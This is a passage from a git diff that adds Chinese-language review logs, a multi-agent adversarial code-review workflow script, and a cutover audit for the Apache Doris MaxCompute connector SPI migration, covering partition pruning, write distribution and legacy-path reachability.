capability `supportsInsertOverwrite` + Option A 决策)作为 doc-sync WIP(这些文件本就有 prior-session 未提交改动,不混入本 issue commit)。 +**scope reminder(非缺陷,设计已述)**: 本 fix 只开 FE 入口网关;live INSERT OVERWRITE 正确性 + NG-2/NG-4(动态分区 local-sort)+ NG-3(静态分区 bind)须 live e2e(CI 跳)。绿网关+绿 UT ≠ e2e overwrite 工作。 diff --git a/plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md new file mode 100644 index 00000000000000..2c102a88eeccc3 --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-PRUNE-PUSHDOWN-review-rounds.md @@ -0,0 +1,58 @@ +# P4-T06e — FIX-PRUNE-PUSHDOWN review 轮次记录 + +> Issue: DG-1 / F1=F7(分区裁剪从未推到 ODPS read session) +> 设计:[P4-T06e-FIX-PRUNE-PUSHDOWN-design.md](../tasks/designs/P4-T06e-FIX-PRUNE-PUSHDOWN-design.md) +> review 编排脚本:[prune-pushdown-review.workflow.js](./prune-pushdown-review.workflow.js)(clean-room,pipeline finder→adversarial verifier) + +--- + +## 前置:recon(根因 + blast-radius 调查) + +workflow `wszm3u9fv`(8 agent,Map 5 reader + Verify 3 lens)+ 主 loop 独立核码(clean-room:先 code 判断,后核对历史)。 + +**根因 3/3 lens 无法证伪**(translator-path / spi-channel / correctness): +- `PhysicalPlanTranslator:753-758`(plugin 分支)从不调 `setSelectedPartitions`(对比 Hive `:773` / legacy-MC `:797` / Hudi `:882`); +- `PluginDrivenScanNode` 无 selectedPartitions 字段;`planScan` 5 参签名无分区通道; +- `MaxComputeScanPlanProvider` 恒传 `Collections.emptyList()`(`:201`/`:320`)→ ODPS session 跨全分区。 +- **返回行仍正确**(MaxCompute 未 override `applyFilter`→conjunct 不清→BE 重算)→ **纯性能/内存回归**。 +- FE 元数据半边 FIX-PART-GATES **已落**;缺的是 translator→SPI→connector 透传(原 READ-C2 修复建议「②」)。 + +--- + +## Round 1 — converged(workflow `w31i0vfo5`,11 agent;4 lens × finder→verifier) + +**配置**:4 lens(parity / correctness / blast-radius / test-quality),每 lens finder 产 finding → 每 finding 1 adversarial verifier(默认 mustFix=false,须独立核码证其为真且 must-fix)。 + +**结论**:**7 verdict,0 must-fix,0 blocker/major 存活 → 1 轮收敛。** + +### 存活 real findings(4,全 test-quality,全非 must-fix) + +| # | sev(claimed→verdict) | 标题 | 处置 | +|---|---|---|---| +| 1 | blocker→**minor** | translator `setSelectedPartitions` 注入无 UT | 接受。与既有约定一致(`HiveScanNodeTest` 亦不经 translator 测,直构 node 调 setter);fail-safe(默认 NOT_PRUNED→scan all,非丢数据);DV-015 live e2e 为真值门。 | +| 2 | major→**minor** | `getSplits()` pruned-to-zero 短路无 UT | 接受。短路是 correctness 不变式,但 code 正确;其逻辑半(三态 resolve)已被 `resolveRequiredPartitions` UT + mutation pin;wiring 半由 DV-015 live 覆盖(同 P0-3/DV-014 先例)。 | +| 3 | major→**minor** | `getSplits→planScan` requiredPartitions threading 无集成测 | 接受。同 #2;threading 是单变量直线流(无分支/转换),最易错的三态映射已单测。 | +| 4 | minor→**minor** | 5 参 planScan→6 参委托无测 | 接受。trivial forwarder;语义契约在 SPI default 方法;`toPartitionSpecs(null)≡toPartitionSpecs([])` 已证等价→该 mutation 行为惰性。连接器模块无 Mockito(建议 fix 不可实现)。 | + +### 证伪 findings(3,isReal=false) + +- **Hudi-SPI plugin 分支未接 setSelectedPartitions**(claimed major)→ 证伪。`CatalogFactory.SPI_READY_TYPES` 不含 hudi → 该分支生产不可达(真 Hudi 走 legacy HMS 路 `:886` 已设);且 `HudiScanPlanProvider` 仅实现 4 参 planScan,default 委托丢 requiredPartitions → 即便接也惰性;**设计已显式登记为 scope 边界(DV-006 deferred)**,非本 fix 引入。 +- **maxcompute 无 read-session 集成测**(claimed major)→ 证伪。两 createReadSession call site 均喂同一 `requiredPartitionSpecs` 变量(直线流,无 hardcoded emptyList 残留);连接器模块无 Mockito + session builder 需 live ODPS → 正确分层(逻辑半 fe-core 测、转换半 maxcompute 测、live 半 DV-015)。 +- **mutation 覆盖不全**(claimed minor)→ 证伪。设计列的 3 个 mutation **全被现有 UT 杀**(已 mutation 实测:maxcompute toPartitionSpecs→emptyList 红;fe-core 去 isPruned 双红);tests 已带 WHY 注释(Rule 9)。 + +### key 裁决(verifier 跨 lens 一致) + +- **parity**:三态映射(NOT_PRUNED→all / pruned-非空→subset / pruned-空→短路)镜像 legacy `MaxComputeScanNode.getSplits():718-731`;`toPartitionSpecs`=legacy `new PartitionSpec(key)`;**两** read-session 路径(标准+limit-opt)均接 requiredPartitions(=legacy getSplits + getSplitsWithLimitOptimization)。无分歧。 +- **blast-radius**:additive 6 参 default overload;es/jdbc/hive/paimon/hudi/trino **零改**(继承 default 委托回各自 planScan);既有 4/5 参调用方不破。唯一 override=MaxCompute。 +- **correctness**:纯性能/内存回归,行正确(conjunct BE 重算;null/empty=scan-all、非空=subset、空=fe-core 短路三态清晰;默认 NOT_PRUNED 保非裁剪/非 MC 行为不变)。 + +## 守门(clean source) + +- compile:fe-connector-api + fe-connector-maxcompute + fe-core 3 模块绿。 +- UT:fe-core `PluginDrivenScanNodePartitionPruningTest` 5/5;maxcompute `MaxComputeScanPlanProviderTest` 3/3。 +- mutation:① fe-core 去 `!isPruned` 守卫 → `testNotPrunedScansAllPartitions`+`testUnprocessedPruningScansAllPartitions` 双红(`expected: but was:<[]>`/`<[pt=1]>`);② maxcompute `toPartitionSpecs`→恒 emptyList → `testConvertsPartitionNamesToSpecs` 红(`<2> vs <0>`)。均还原。 +- checkstyle 0×3;import-gate 净。 + +## KNOWN-LIMITATION(→ DV-015) + +`getSplits()` 短路 + translator `setSelectedPartitions` 注入 + planScan threading 无 fe-core 端到端 UT(连接器 scan 无轻量 analyze/spy harness;与 P0-3/DV-014 同因)。逻辑半(`resolveRequiredPartitions` 三态 + `toPartitionSpecs` 转换)已 UT+mutation pin;wiring 半 + 真实裁剪生效由 **DV-015 live e2e** 覆盖(`test_max_compute_partition_prune.groovy`,p2;真值证据=EXPLAIN/profile 仅扫目标分区 + `WHERE pt='不存在'`→0 行不建全分区 session)。 diff --git a/plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md b/plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md new file mode 100644 index 00000000000000..88ce875b920ce8 --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md @@ -0,0 +1,51 @@ +# FIX-WRITE-DISTRIBUTION (P0-2) — 对抗 review 轮次记录 + +> issue: NG-2 (F17, blocker) + NG-4 (F18, major) — 翻闸后 MaxCompute 写走通用 `PhysicalConnectorTableSink`, +> 丢失 legacy `PhysicalMaxComputeTableSink` 的动态分区 hash+local-sort("writer has been closed")+ 并行写退化为 GATHER。 +> 设计: `plan-doc/tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md` +> review workflow: `plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js`(clean-room:Phase A 2 lens 只读码 → Phase B 3 票对抗 refute → Phase C 解禁先验交叉核对) +> 流程: 每轮记结论防跨轮矛盾;最多 5 轮。 + +--- + +## 编译 + UT + mutation(pre-review gate) + +**改动 4 文件**: +1. `ConnectorCapability.java` — 新增 `SINK_REQUIRE_PARTITION_LOCAL_SORT`(连接器声明动态分区写需 hash+local-sort)。 +2. `MaxComputeDorisConnector.java` — 新增 `getCapabilities()` override = `{SUPPORTS_PARALLEL_WRITE, SINK_REQUIRE_PARTITION_LOCAL_SORT}`(此前无 override → 空集 → GATHER)。 +3. `PluginDrivenExternalTable.java` — 新增 `requirePartitionLocalSortOnWrite()`(镜像 `supportsParallelWrite()`,读新能力)。 +4. `PhysicalConnectorTableSink.getRequirePhysicalProperties()` — 重写为 legacy 3 分支(动态分区→hash+local-sort / 非分区·全静态→RANDOM / 无能力→GATHER)。**关键修正 vs legacy**:分区列 → child output 索引按 **cols 位置**(通用 connector sink 的 child 投影到 cols 序),而非 legacy 的 full-schema 位置。 + +**blast radius**(grep 实证): `SUPPORTS_PARALLEL_WRITE`/`supportsParallelWrite` 仅 2 reader(table 方法本身 + 本 sink);新能力仅 1 reader(新 table 方法);唯一另一 `getCapabilities()` consumer = `QueryTableValueFunction` 查 `SUPPORTS_PASSTHROUGH_QUERY`(MaxCompute 不声明,不受影响)。→ 仅影响 `getRequirePhysicalProperties()` 及其 2 consumer(`RequestPropertyDeriver` / `ShuffleKeyPruner`)。 + +**编译**: 3 模块(fe-connector-api / fe-connector-maxcompute / fe-core)BUILD SUCCESS;fe-core + 连接器 checkstyle 干净。 +**UT**: `PhysicalConnectorTableSinkTest` 4/4 过(dynamic→hash+sort / all-static→RANDOM / non-part→RANDOM / no-cap→GATHER),`Tests run: 4, Failures: 0, Errors: 0`,MVN_EXIT=0。 +**mutation(Rule 9)**: 用 `cp` 备份产线文件,把 `getRequirePhysicalProperties()` 还原为 pre-fix 逻辑(`supportsParallelWrite ? SINK_RANDOM_PARTITIONED : GATHER`)→ 跑 4 测(`-Dcheckstyle.skip=true`,避开还原后未用 import 被 UnusedImports 挡在 test 前)。结果 `Tests run: 4, Failures: 1`,**唯 T1 `dynamicPartitionWriteRequiresHashAndLocalSort` 红**(`:82` `dynamic-partition write must hash-distribute by partition columns ==> expected: but was: ` —— 还原后产出 RANDOM 而非 hash+sort),T2/T3(RANDOM)/T4(GATHER)仍绿(pre-fix 逻辑对这三个 case 恰好同果)。证 T1 精确守门 NG-2 动态分区 hash+local-sort 修复。还原产线码,绿 4/4 复现。 + +--- + +## Round 1(2026-06-07)— verdict: **CONVERGED(converged-or-known)** + +**review 机制**: clean-room workflow `ww1g95bba`(`P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js`,29 agents / 1.60M tokens / 11.5min)— Phase A 2 lens(parity / delivery)只读码对照 legacy + 下游 consumer → Phase B 每 finding 3 票对抗 refute → Phase C 解禁 design/history 交叉核对。 + +**裁决**: `rawFindings=8 → survived=3 → newGaps=0 / disagreements=0 / **mustFix=0**`。**3 存活全 `known-degradation` + `matchesDesignIntent=true`**。 + +**两 lens 终评(强验证)**: +- **parity**: "faithfully generalizes legacy 3-branch … index mapping is **CORRECT and self-consistent** … cols-index 与 cutover 的 cols-order child output 一致 … no wrong slot, no off-by-one, no IndexOutOfBounds(BindSink 强制 `cols.size()==child.getOutput().size()`)… `DistributionSpec/MustLocalSortOrderSpec/OrderKey` **byte-for-byte identical to legacy** … 三 case(动态/全静态/非分区)均达 legacy parity"。 +- **delivery**: "correct and not a regression for the shapes it targets … **blast radius tightly contained**(仅 MaxCompute 声明两能力;两能力常量除新 table 方法+sink 外无 reader)… residual risk = pre-existing 静态分区 bind gap(NG-3,本 change surface 外)"。 + +**3 存活 finding(全 known-degradation,无须改本 commit)**: +| id | sev | 标题 | Phase C 处置 | +|---|---|---|---| +| F2 | major | `bindConnectorTableSink` 不剔静态分区列 → 阻断 all-static 写(本 change surface 外) | **NG-3/P0-3 耦合**,本设计已登记。归 P0-3(FIX-BIND-STATIC-PARTITION)。本 commit 无改。 | +| F4 | major | all-static 分支因 bind 不剔静态列而不可达 | 同上。Phase C **更正过度声明**:all-static 无列名形态今日在 bind `:941` 计数不符**抛错**(dormant),**不会**静默误判为 dynamic(child output 列数 < bindColumns,Consequence B 不可能发生)。 | +| F5 | major(test) | T2 手搭 cols 真 bind 路径不产出 | known-degradation。**本轮顺手澄清 T2 javadoc**:该 all-static 输入今日经 explicit-column-list 形态(`PARTITION(p='x') (data) SELECT data` → colNames=[data])可达,P0-3 后经 no-column-list 形态可达。 | + +**Phase B 已退(未存活)**: ShuffleKeyPruner connector 分支缺 `enableStrictConsistencyDml` 短路(一审 regression=yes / 一审 no)→ 3 票多数 refute(确认仅 non-strict 下"少剪 = 更保守 = 无正确性损",**默认 strict 下与 legacy MC 同果**);RequestPropertyDeriver GATHER 短路(MC 不可达);multi-partition order-key 序(cols 序 vs full-schema 序,grouping 等价);co-declaration 隐性依赖(仅对假想连接器)。**均证我设计已述的 known/intended,Phase B 即退场。** + +**本轮收尾改动(非 must-fix,clarity-only,不改产线逻辑/不改测试逻辑→无须再 review)**: +1. T2 javadoc 澄清 all-static 输入可达性(explicit-col-list 今日可达 / no-col-list P0-3 后可达 / 今日 no-col-list 抛错故 dormant 非误判)。 +2. 设计文档 P0-3 耦合段加 forward-pointer:P0-3 落后加 all-static no-col-list 集成回归;Batch-D 删 legacy 须待本 fix + P0-3 双落。 + +**结论:P0-2 代码 CONVERGED(1 轮,0 must-fix)**。3 存活均 known-degradation/已登记。 +**scope reminder(非缺陷,设计已述)**: 本 fix 只定 FE planner 写分发;live 真值闸 = 真实 ODPS 跨多动态分区 INSERT 无 "writer has been closed" + 非分区并行吞吐(CI 跳,须与 P0-3 一并 live 验)。 diff --git a/plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js b/plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js new file mode 100644 index 00000000000000..9d9dc81d694293 --- /dev/null +++ b/plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js @@ -0,0 +1,210 @@ +// Clean-room adversarial review of the FIX-WRITE-DISTRIBUTION change (P4-T06e, P0-2 / NG-2 / NG-4). +// +// HOW TO RUN: +// Workflow({ scriptPath: "plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION.workflow.js" }) +// optional: args: { verifyVotes: 3, lenses: 2 } +// +// DISCIPLINE (clean-room, per HANDOFF): +// - Phase A (Review) + Phase B (Verify) are CODE-ONLY. Prompts carry ONLY source pointers and the +// "cutover vs legacy" framing. Reviewers must NOT read plan-doc/ (design/review/decisions/HANDOFF) +// and must NOT assume "it was fixed / mutation-proven". The change is treated as unaudited. +// - Phase C (CrossCheck) is the ONLY phase that may read the design doc + history, and only to +// classify already-independently-confirmed findings (matches-design-intent / contradicts-history / +// test-vacuous-risk / batch-D red-line). +// +// Returns structured data; the orchestrator writes the round into +// plan-doc/reviews/P4-T06e-FIX-WRITE-DISTRIBUTION-review-rounds.md + +export const meta = { + name: 'fix-write-distribution-review', + description: 'Clean-room adversarial review of FIX-WRITE-DISTRIBUTION (connector sink distribution + local-sort)', + phases: [ + { title: 'Review', detail: 'parity + delivery clean-room lenses over the change (code-only)' }, + { title: 'Verify', detail: 'refute-by-default skeptics per finding (code-only)' }, + { title: 'CrossCheck', detail: 'classify survivors vs design/history (Phase C only)' }, + ], +} + +const REPO = '/mnt/disk1/yy/git/wt-catalog-spi' +const verifyVotes = (args && args.verifyVotes) || 3 +const lensCount = (args && args.lenses) || 2 + +const CLEANROOM = `You are a CLEAN-ROOM code reviewer. Repo root: ${REPO}. +CONTEXT: MaxCompute was migrated to a connector-SPI. After the cutover a max_compute catalog is a +PluginDrivenExternalCatalog and its tables are TableType.PLUGIN_EXTERNAL_TABLE, so a MaxCompute write +flows through the GENERIC nereids sink PhysicalConnectorTableSink instead of the legacy +PhysicalMaxComputeTableSink. A change ("FIX-WRITE-DISTRIBUTION") just modified the generic sink's +required-physical-properties (write distribution + sort) and added connector capabilities so MaxCompute +writes get the right distribution. Your job: judge this change INDEPENDENTLY from code, comparing the +CUTOVER behavior to the LEGACY behavior. + +THE CHANGE (read these): + - fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalConnectorTableSink.java + -> getRequirePhysicalProperties() (the new 3-branch logic) + - fe/fe-core/src/main/java/org/apache/doris/datasource/PluginDrivenExternalTable.java + -> requirePartitionLocalSortOnWrite() and supportsParallelWrite() + - fe/fe-connector/fe-connector-api/src/main/java/org/apache/doris/connector/api/ConnectorCapability.java + -> SINK_REQUIRE_PARTITION_LOCAL_SORT + - fe/fe-connector/fe-connector-maxcompute/src/main/java/org/apache/doris/connector/maxcompute/MaxComputeDorisConnector.java + -> getCapabilities() + +LEGACY BASELINE to compare against: + - fe/fe-core/src/main/java/org/apache/doris/nereids/trees/plans/physical/PhysicalMaxComputeTableSink.java + -> getRequirePhysicalProperties():111-155 (the 3-branch this generalizes) + +DOWNSTREAM CONSUMERS of getRequirePhysicalProperties() (verify the change composes correctly): + - fe/fe-core/src/main/java/org/apache/doris/nereids/properties/RequestPropertyDeriver.java + -> visitPhysicalConnectorTableSink():212-227 vs visitPhysicalMaxComputeTableSink():180-188 + - fe/fe-core/src/main/java/org/apache/doris/nereids/processor/post/ShuffleKeyPruner.java + -> visitPhysicalConnectorTableSink() vs visitPhysicalMaxComputeTableSink() + - bind-time child-output alignment: fe/fe-core/.../nereids/rules/analysis/BindSink.java + -> bindConnectorTableSink() (projects child to cols order) vs bindMaxComputeTableSink() (projects to full schema) + - SessionVariable.enableStrictConsistencyDml default + +STRICT DISCIPLINE: + - Read ONLY source code (fe/, be/, gensrc/). Use git/grep/file reads. + - DO NOT read anything under plan-doc/ and do NOT rely on remembered project conclusions. + - Make NO assumption that the change "is correct" or "was tested". Treat it as unaudited. + - Every finding MUST cite file:line and state the concrete CUTOVER vs LEGACY behavioral difference and + whether it is a regression (yes/no/unsure). "The code intends X" is not evidence — verify X holds. + - Zero findings is a valid result if the change faithfully generalizes legacy and composes correctly.` + +const LENSES = [ + { key: 'parity', focus: `LEGACY-PARITY & CORRECTNESS. Does the new generic sink reproduce, for a MaxCompute table, the +EXACT distribution/sort legacy PhysicalMaxComputeTableSink produced in all three cases (dynamic partition, +all-static partition, non-partitioned)? Pay special attention to the partition-column -> child-output INDEX +mapping: legacy indexes child().getOutput() by FULL-SCHEMA position (its child is projected to full schema); +the generic connector sink's child is projected to COLS order. Is the new code's indexing correct for the +generic sink (no wrong slot, no off-by-one, no IndexOutOfBounds)? Are the hash exprIds and local-sort order +keys the right slots? Does the enableStrictConsistencyDml interaction in RequestPropertyDeriver match legacy?` }, + { key: 'delivery', focus: `DELIVERY, EDGE CASES & BLAST RADIUS. Does declaring SUPPORTS_PARALLEL_WRITE + +SINK_REQUIRE_PARTITION_LOCAL_SORT for MaxCompute change anything beyond getRequirePhysicalProperties()? Find +ALL readers of these capabilities. Could the new branch fire for the wrong connector (jdbc/es/trino) or wrong +write shape? Edge cases: empty cols, partition col absent from cols, multi-level (mixed static+dynamic) +partitions, ShuffleKeyPruner divergence between the connector branch and the MC branch (is it a real +regression?), and interaction with the not-yet-fixed static-partition bind (NG-3). Cite file:line.` }, +] + +const FINDINGS_SCHEMA = { + type: 'object', additionalProperties: false, + properties: { + assessment: { type: 'string', description: 'one-paragraph independent verdict: does the change reach legacy parity and compose correctly?' }, + findings: { + type: 'array', + items: { + type: 'object', additionalProperties: false, + properties: { + title: { type: 'string' }, + severity: { type: 'string', enum: ['blocker', 'major', 'minor', 'nit'] }, + category: { type: 'string', enum: ['correctness', 'parity', 'regression', 'design-impl-gap', 'blast-radius', 'test-quality', 'other'] }, + location: { type: 'string', description: 'file:line' }, + description: { type: 'string' }, + cutover_vs_legacy: { type: 'string' }, + regression: { type: 'string', enum: ['yes', 'no', 'unsure'] }, + why_it_matters: { type: 'string' }, + }, + required: ['title', 'severity', 'category', 'location', 'description', 'cutover_vs_legacy', 'regression', 'why_it_matters'], + }, + }, + }, + required: ['assessment', 'findings'], +} +const VERDICT_SCHEMA = { + type: 'object', additionalProperties: false, + properties: { refuted: { type: 'boolean' }, confidence: { type: 'string', enum: ['low', 'medium', 'high'] }, reasoning: { type: 'string' } }, + required: ['refuted', 'confidence', 'reasoning'], +} +const CROSSCHECK_SCHEMA = { + type: 'object', additionalProperties: false, + properties: { + status: { type: 'string', enum: ['new-gap', 'known-degradation', 'already-handled', 'disagreement-with-design', 'false-positive'] }, + matchesDesignIntent: { type: 'boolean' }, + evidence: { type: 'string', description: 'cite the design doc section/commit and/or code' }, + recommended_action: { type: 'string' }, + }, + required: ['status', 'matchesDesignIntent', 'evidence', 'recommended_action'], +} + +// ===================== Phase A — clean-room review ===================== +phase('Review') +const lenses = LENSES.slice(0, Math.max(1, Math.min(LENSES.length, lensCount))) +const reviewResults = await parallel(lenses.map(lens => () => + agent( + `${CLEANROOM}\n\nLENS: ${lens.focus}\n\nReturn an independent assessment of the change plus concrete findings (each with file:line, cutover-vs-legacy diff, regression judgment).`, + { label: `review:${lens.key}`, phase: 'Review', schema: FINDINGS_SCHEMA } + ).then(r => ({ lens: lens.key, assessment: r && r.assessment, findings: (r && r.findings) || [] })) +)) + +const assessments = reviewResults.filter(Boolean).map(r => ({ lens: r.lens, assessment: r.assessment })) +const allFindings = reviewResults.filter(Boolean) + .flatMap(r => r.findings.map(f => ({ ...f, lens: r.lens }))) + .map((f, i) => ({ ...f, id: `F${i + 1}` })) +log(`Phase A: ${allFindings.length} raw findings across ${lenses.length} lenses`) + +if (allFindings.length === 0) { + return { verdict: 'clean', assessments, survivors: [], note: 'No findings surfaced by any clean-room lens.' } +} + +// ===================== Phase B — adversarial verify ===================== +phase('Verify') +const verified = await parallel(allFindings.map(f => () => + parallel(Array.from({ length: verifyVotes }, (_, k) => () => + agent( + `${CLEANROOM}\n\nADVERSARIAL VERIFY (skeptic #${k + 1}). Try to REFUTE this finding from code. Default refuted=true unless the code clearly proves a real defect or a real cutover-vs-legacy regression in the CURRENT change. Cite file:line.\nFINDING [${f.severity}/${f.category}] ${f.title}\nLocation: ${f.location}\n${f.description}\nClaimed cutover-vs-legacy: ${f.cutover_vs_legacy}\nWhy: ${f.why_it_matters}`, + { label: `verify:${f.id}.${k + 1}`, phase: 'Verify', schema: VERDICT_SCHEMA } + ) + )).then(votes => { + const v = votes.filter(Boolean) + const confirms = v.filter(x => !x.refuted).length + return { ...f, confirms, votes: v.length, survives: confirms * 2 >= v.length && confirms >= 2 } + }) +)) +const survivors = verified.filter(Boolean).filter(f => f.survives) +log(`Phase B: ${survivors.length}/${allFindings.length} findings survived (majority & >=2 confirm)`) + +if (survivors.length === 0) { + return { + verdict: 'clean', + assessments, + survivors: [], + allFindings: verified.filter(Boolean).map(f => ({ id: f.id, lens: f.lens, title: f.title, confirms: f.confirms, votes: f.votes })), + } +} + +// ===================== Phase C — cross-check vs design/history ===================== +phase('CrossCheck') +const QUARANTINE = `Now (and ONLY now) you MAY consult the design + history to classify an already-confirmed +finding. Repo root: ${REPO}. Relevant: + - plan-doc/tasks/designs/P4-T06e-FIX-WRITE-DISTRIBUTION-design.md (the design for this change) + - plan-doc/reviews/P4-maxcompute-full-rereview-2026-06-07.md (§A.NG-2/NG-4 the source findings) + - plan-doc/tasks/designs/P4-batchD-maxcompute-removal-design.md (Batch-D red-line: deleting PhysicalMaxComputeTableSink) + - plan-doc/decisions-log.md, plan-doc/deviations-log.md +Classify: + - new-gap: a genuine defect/divergence the change introduced or left, NOT covered by the design. + - known-degradation: the design explicitly registers it as accepted/known (e.g. ShuffleKeyPruner non-strict + divergence, enable_strict_consistency_dml=false parity, P0-3 coupling). + - already-handled: the code already handles it; the finding is mistaken. + - disagreement-with-design: the design CLAIMS something the code does not do (surface loudly). + - false-positive: not actually true. +Also judge matchesDesignIntent (does the change match its own design doc?) and whether the Batch-D red-line +(delete PhysicalMaxComputeTableSink only after this lands) is satisfied.` +const crossed = await parallel(survivors.map(f => () => + agent( + `${QUARANTINE}\n\nFINDING [${f.severity}/${f.category}] (confirms ${f.confirms}/${f.votes})\n${f.title}\nLocation: ${f.location}\n${f.description}\nCutover-vs-legacy: ${f.cutover_vs_legacy} | regression: ${f.regression}`, + { label: `crosscheck:${f.id}`, phase: 'CrossCheck', schema: CROSSCHECK_SCHEMA } + ).then(c => ({ ...f, crosscheck: c })) +)) + +const confirmed = crossed.filter(Boolean) +const newGaps = confirmed.filter(f => f.crosscheck && f.crosscheck.status === 'new-gap') +const disagreements = confirmed.filter(f => f.crosscheck && f.crosscheck.status === 'disagreement-with-design') +const mustFix = confirmed.filter(f => f.crosscheck + && (f.crosscheck.status === 'new-gap' || f.crosscheck.status === 'disagreement-with-design')) + +return { + verdict: mustFix.length === 0 ? 'converged-or-known' : 'needs-revision', + stats: { lenses: lenses.length, verifyVotes, rawFindings: allFindings.length, survived: survivors.length, newGaps: newGaps.length, disagreements: disagreements.length }, + assessments, + mustFix: mustFix.map(f => ({ id: f.id, severity: f.severity, category: f.category, title: f.title, location: f.location, description: f.description, cutover_vs_legacy: f.cutover_vs_legacy, status: f.crosscheck.status, matchesDesignIntent: f.crosscheck.matchesDesignIntent, action: f.crosscheck.recommended_action })), + knownOrHandled: confirmed.filter(f => !mustFix.includes(f)).map(f => ({ id: f.id, severity: f.severity, title: f.title, location: f.location, status: f.crosscheck && f.crosscheck.status, action: f.crosscheck && f.crosscheck.recommended_action })), +} diff --git a/plan-doc/reviews/P4-cutover-completeness-audit-2026-06-08.md b/plan-doc/reviews/P4-cutover-completeness-audit-2026-06-08.md new file mode 100644 index 00000000000000..08f0aaee326282 --- /dev/null +++ b/plan-doc/reviews/P4-cutover-completeness-audit-2026-06-08.md @@ -0,0 +1,134 @@ +# P4 翻闸完整性审计 — MaxCompute 全操作 SPI 路由 / legacy 零可达(静态分发面) + +> **任务 0**(用户 2026-06-08 新增):「确认所有 maxcompute 的操作,都走到新的 SPI 框架上,不允许回退到老的代码上。」 +> **方法**:4 路 **clean-room 并行 subagent**(read / write / DDL / metadata)逐 op trace「FE 入口 → SPI 实现」+「legacy 零可达」;主线独立核 foundational(CatalogFactory / PluginDrivenExternalCatalog)+ 2 项对抗交叉核查(GSON replay、batch SPI default)。agents **不喂**历史「已修/已坏」结论([[clean-room-adversarial-review-pref]]),主线持先验、事后交叉核对 2026-06-07 domain-6 裁决。 +> **范围**:24 op(读 6 / 写 6 / DDL 6 / 元数据 6)。**与 🅰 live e2e 并列为 🅱 Batch-D 删 legacy 的两大解锁门:本审计 = 静态分发面,🅰 = 运行时真值面。** +> **来源**:4 subagent 报告(read=aa148bc6 / write=a5852ff0 / ddl=afb77712 / metadata=a1b491a8)+ 主线核码。 + +--- + +## 结论(TL;DR) + +**24/24 op 全 ROUTE✅ — 0 FALLBACK / 0 GAP。** `max_compute` 的每一类操作在运行时均经 PluginDriven SPI 框架;**无任何静默回退到 legacy `MaxCompute*` 路径**。所有 legacy 删除候选(HANDOFF 列 8 个 + 审计新增 ~9 个)全部确认运行时死(live dispatch + GSON replay 两路均闭)。 + +➡️ **静态分发面门 = PASS。** Batch-D 删 legacy 在**静态轴解锁**;执行仍 gated on 🅰 **live e2e**(运行时真值面,CI 跳)。本审计**不**替代 e2e。 + +➡️ 本结论**再确认**了 2026-06-07 复审 domain-6 的「dispatch 基本干净 / legacy 死而存」裁决(`P4-maxcompute-full-rereview-2026-06-07.md:138`),但以 4 路独立 clean-room + 逐 op file:line 证据重建,不信任何「已修」标签(Rule 8/12)。当年两度被证伪的,是 INSERT OVERWRITE 网关 / 分区裁剪 / DROP DB FORCE / CREATE DB 预检等**行为 parity**(非 dispatch 可达性),且**均已在 P0/P1-4/P2/P3 + G 系列修复并在此确认 dispatch-clean**。 + +--- + +## 0. 决定性机制(linchpin,4 路独立收敛于此) + +整张审计塌缩为**一个事实**: + +> **`max_compute` 运行时的 catalog / db / table 对象恒为 `PluginDrivenExternal{Catalog,Database,Table}`,绝不为 legacy `MaxComputeExternal*`。** 故代码中每一处 legacy 分支(皆为 `instanceof MaxComputeExternalCatalog` / `instanceof MaxComputeExternalTable` / `instanceof PhysicalMaxComputeTableSink` / `instanceof UnboundMaxComputeTableSink` 守卫)在运行时**结构性为 false**,紧邻的 PluginDriven 分支接住该 case 抵达 SPI。 + +证据链(主线 + 4 agent 交叉确认): +- **Catalog**:`CatalogFactory.java:51-52` `SPI_READY_TYPES ∋ "max_compute"` → `:105-113` 建 `PluginDrivenExternalCatalog`;legacy `MaxComputeExternalCatalog` **不在** `:134-161` fallback switch,全 fe-core main **零 `new MaxComputeExternalCatalog`**。 +- **DB**:`PluginDrivenExternalCatalog.buildDbForInit:482-486` 强制 `InitCatalogLog.Type.PLUGIN` → 建 `PluginDrivenExternalDatabase`(`ExternalCatalog:950-951`);`case MAX_COMPUTE`(`ExternalCatalog:938-939`)不可达。 +- **Table**:`PluginDrivenExternalDatabase.buildTableInternal:41` 建 `PluginDrivenExternalTable`;legacy `MaxComputeExternalTable` 仅 `MaxComputeExternalDatabase.buildTableInternal:43` 建(该 db 从不为 mc 创建)。两类均直接 `extends ExternalTable`,类型不相交。 +- **Replay/反序列化**:`GsonUtils.java:411 / :463 / :484` 三注册 `registerCompatibleSubtype(PluginDrivenExternal{Catalog,Database,Table}.class, "MaxComputeExternal{Catalog,Database,Table}")` → 老镜像的三类 legacy 类型串**全部反序列化为 PluginDriven**。replay 路同样不实例化 legacy。([[catalog-spi-gson-migrate-all-three]] 三注册齐备;第二参为字符串字面量、不 import legacy 类,删类后仍有效、应保留。) +- **Txn**:`PluginDrivenExternalCatalog.initLocalObjectsImpl:118` 置 `transactionManager = new PluginDrivenTransactionManager()`。 + +--- + +## 1. 读路径(6/6 ROUTE✅) + +| Op | 判定 | FE 入口 (file:line) | SPI 实现 (file:line) | legacy 可达?(判据) | +|---|---|---|---|---| +| 表扫描(ScanNode 选型) | ROUTE✅ | `PhysicalPlanTranslator:753`(`instanceof PluginDrivenExternalTable` **先匹配**)→ `PluginDrivenScanNode.create:756` | `PluginDrivenScanNode:91`/ctor`:150` → `MaxComputeScanPlanProvider.planScan:178` | 否 — `new MaxComputeScanNode`@`translator:800` 在 `else if instanceof MaxComputeExternalTable` 下、类型不可达 | +| 分区裁剪(P1-4) | ROUTE✅ | `PruneFileScanPartition:64`(`supportInternalPartitionPruned`=true 